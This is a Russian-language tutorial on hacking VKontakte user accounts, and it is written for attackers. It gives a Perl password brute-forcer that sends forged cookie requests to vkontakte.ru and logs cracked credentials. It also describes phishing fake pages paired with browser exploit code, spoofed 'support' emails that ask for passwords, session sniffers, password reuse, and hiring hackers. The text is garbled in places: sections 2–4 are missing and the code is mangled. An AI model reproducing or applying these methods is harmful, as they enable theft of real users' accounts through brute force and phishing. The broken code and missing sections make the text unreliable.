В данной статье, попытаюсь рассказать о возможных способах взлома анкет "ВКонтакте".
Итак, что же нам потребуется:
Умение настраивать пинч (если это у вас уже получилось, то остальные 2 требования можно не смотреть)
Прямые руки и хотя бы капелька мозга!
1 Способ - Взлом мыла:
Если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты/packages/perl. html
Code
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
open (pass, “create(&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’vkontakte. ru’,PeerPor t=>80);
print $sock “HEAD http://vkontakte. ru/ HTTP/1.0rn”.
“Host: vkontakte. rurn”.
“Accept: */*rn”.
“Content-Type: application/x-www-form-urlencodedrn”.
“User-Agent: Mozillorn”.
“C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn”.
“Connection: closernrn”;
$answ = ;
close $sock;
print “$pass $answ”;
if ($answ =~ /302/){
open (good, ‘>>good. txt’);
print good “$id:$pass:$md5n”;
print “$id:$pass:$md5n”;
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Не забудьте сменить разширение на brut. pl
$dic = ‘passl. txt’; #паслист для брдутфорсера
$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы)
$mail = ‘мыло’; #мыло, значек @ меняем на %40
$threads = Х; # где Х - количество потоков
Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке http://slil. ru/25774498, сразу говорю, если не запускается - это ваши проблемы, ибо все прекрасно работает!
5 Способ
Самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ******
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, т. к. теперь у нас на ссылке комбинированная атака на мозг (фейк) и браузер (код ******).
6 Способ:
Довольно известный, здесь нужно поискать сайты на которых сидит жертва (форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного, авось найдем старый заброшенный пароль, а он подойдет.
7 Способ:
Как обычно СИ, пробуем отправить письмо от адресата *****@***ru или *****@***ru с текстом типа, ваша страница на сайте vkontakte. ru будет заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля.
Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и т. п., от такого-то пользователя, чтобы ее прочитать перейдите по ссылке, а ссылка будет вести на наш фейк.
Чтобы отправить письмо с "левого" адреса, нужен какой-нить майлер, например, этот http://softnic. ru/soft/programm_4223.html, либо любой подходящий для вас из гугла.
Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия. (чтобы пароли пришли именно вам на почту).
Снифер, тут лучше отправлять его на почту (если мы знаем мыло), тогда без лишних проблем сможем перехватить сессию, и с помощью системы восстановления пароля на сайте вконтакте получить письмо с паролем.
http://forum. antichat. ru/showthread. php? p=457280
Есть сниферы и получше, но они платные, все же тема распространена, в гуле можно ввсести запрос на php снифер и найти много полезной инфы.
8 Способ - ХSS:
Паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если очень долго подождать, то можно и дождаться паблик уязвимости - но
такой подход к делу бредовый, поэтому останавливаться на нем не будем.
9 Способ - Самый простой:
Единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог ни один из вышеперечисленных пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - http://www. hackzone. ru/forum/list/fid/23/ или здесь http://www. hackzone. ru/forum/list/fid/4/
Но перед тем как задать вопрос воспользуйтесь полезными ссылками:
google. ru
http://www. /stat/st1.php
http://segfault. /smart-questions-ru. html
http://penguin. kurgan. ru/doc/Perl/perlfaq1.htm
Ну и на последок -
На этом все, надеюсь вам не было скучно при чтении этой статьи.
|
